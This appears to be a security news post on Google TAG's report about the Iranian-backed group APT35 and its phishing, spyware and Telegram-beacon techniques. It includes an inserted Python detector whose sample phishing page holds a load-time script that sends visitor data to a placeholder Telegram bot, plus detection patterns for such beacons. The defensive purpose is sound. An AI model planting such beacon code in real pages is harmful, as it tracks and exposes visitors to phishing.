Google issues official warning about hacker group backed by the Iranian government

Google's Threat Analysis Group (TAG), the team that works to prevent targeted attacks against Google services, has issued an official warning about the hacker group 'APT35', which is said to be backed by the Iranian government. In the warning, TAG describes the techniques APT35 uses.

Countering threats from Iran

According to TAG, APT35 is a hacker group that has conducted espionage on behalf of the Iranian government for many years; most recently, TAG learned that it launched a credential stuffing attack against the private email addresses of election officials during the 2020 US presidential election. The attack methods of APT35 disclosed by TAG are as follows.

◆ Credential phishing attacks using hacked websites
In early 2021, APT35 compromised a website affiliated with a British university and used it to send emails inviting targets to a fake online seminar. To join the seminar, victims were asked to enter credentials such as their Google or Microsoft account details, and also the two-step verification code sent to their device.

The actual web page looked like the one below; visitors are prompted to log in with a Google or Microsoft account.

According to TAG, APT35 has used this method since around 2017, selecting government agencies, academic institutions, news organizations, NGOs and others as its targets.

◆ Distribution of spyware apps
In May 2020, TAG discovered that APT35 was attempting to upload spyware to the Google Play store. The app was disguised as VPN software; once installed, it stole sensitive information such as call logs, text message contents, contacts, and location data. Google detected and removed the app from the Google Play store before any user installed it, but in July 2021 similar apps were reportedly being distributed on app distribution platforms other than the Google Play store. The VPN app containing this spyware looked like this:

◆ Phishing attacks impersonating conference personnel
What TAG calls 'one of the most striking features of APT35' is impersonating conference personnel. APT35 first sent a non-malicious email about a real Italian conference and, once the recipient replied, followed up with an email containing a phishing link. According to TAG, clicking the link in the second email redirects the user to a phishing domain. APT35 abuses URL shortening services to disguise its URLs, and in some cases redirects victims to a phishing site disguised as a Google Forms page.

◆ Attack using Telegram's notification function
One of APT35's novel methods is to use Telegram, a privacy-focused social networking service. APT35 embedded JavaScript in its phishing pages that sends a notification via Telegram whenever the page is loaded; these messages were posted indiscriminately to a public channel, giving the attackers the visitor's IP address and locale. TAG reported the bot that APT35 used to send these messages to Telegram, and Telegram has already removed it.
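A defender-side check for the beacon pattern described above, added here as an example that is not part of the original article or of TAG's report. It scans a page's inline scripts for a Telegram Bot API call combined with a load hook or visitor fingerprinting; the two sample pages, the placeholder bot token and the channel name are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Telegram Bot API call with a bot token: the channel APT35's pages beaconed to.
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot\d+:[\w-]+/send\w+", re.I)
# Visitor data such a beacon typically carries (locale, user agent, IP lookups).
FINGERPRINT_HINTS = ("navigator.language", "navigator.userAgent", "ipify", "ipinfo")
# Hooks that fire the beacon as soon as the page loads.
LOAD_HOOKS = ("window.onload", "DOMContentLoaded", "addEventListener('load'", 'addEventListener("load"')

class ScriptExtractor(HTMLParser):
    """Collect the body of every <script> element in a page."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def analyze(html):
    """Return one finding per script that calls the Telegram Bot API."""
    parser = ScriptExtractor()
    parser.feed(html)
    findings = []
    for script in parser.scripts:
        if TELEGRAM_BOT_API.search(script):
            findings.append({"on_load": any(h in script for h in LOAD_HOOKS),
                             "fingerprint": sorted(h for h in FINGERPRINT_HINTS if h in script)})
    return findings

def is_suspicious(html):
    """A Bot API beacon that fires on load or carries visitor data is the APT35 pattern."""
    return any(f["on_load"] or f["fingerprint"] for f in analyze(html))

# Constructed samples (placeholder bot token and channel, not real identifiers).
PHISHING_PAGE = """<html><body><form><input name="password"></form><script>
window.onload = function () {
  fetch("https://api.telegram.org/bot123456:PLACEHOLDER_TOKEN/sendMessage?chat_id=@examplechannel&text="
        + encodeURIComponent(navigator.language));
};
</script></body></html>"""
BENIGN_PAGE = "<html><body><script>document.title = 'Sign in';</script></body></html>"
```

Running `is_suspicious` over pages flagged by a mail gateway or URL sandbox gives a cheap first-pass filter; a hit is a reason to inspect the page, not a verdict on its own.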

TAG urges workspace administrators to take attack warning notifications seriously, to enroll in the Advanced Protection Program where possible, and to enable two-factor authentication.

in Security, Posted by darkhorse_log